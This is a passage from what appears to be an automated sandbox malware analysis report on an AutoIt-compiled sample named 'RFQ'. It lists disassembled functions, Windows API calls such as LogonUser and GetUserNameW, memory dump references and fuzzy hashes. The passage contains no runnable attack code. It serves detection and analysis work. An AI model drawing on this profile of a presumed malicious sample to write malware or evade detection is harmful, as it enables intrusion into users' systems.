                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                          Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                          Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                          Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N@
                                                                          • API String ID: 0-1509896676
                                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                          Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                          Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                          Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                          Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                          Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                          • _wcslen.LIBCMT ref: 00459916
                                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 4040870279-2373415609
                                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                          Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                          • String ID:
                                                                          • API String ID: 69173610-0
                                                                          • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                          • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                          Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                          Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsnicmp
                                                                          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                          • API String ID: 1038674560-3360698832
                                                                          • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                          • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                          • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                          • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                          Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                          • SetCursor.USER32(00000000), ref: 0043075B
                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                          • SetCursor.USER32(00000000), ref: 00430773
                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                          • SetCursor.USER32(00000000), ref: 0043078B
                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                          • SetCursor.USER32(00000000), ref: 004307A3
                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
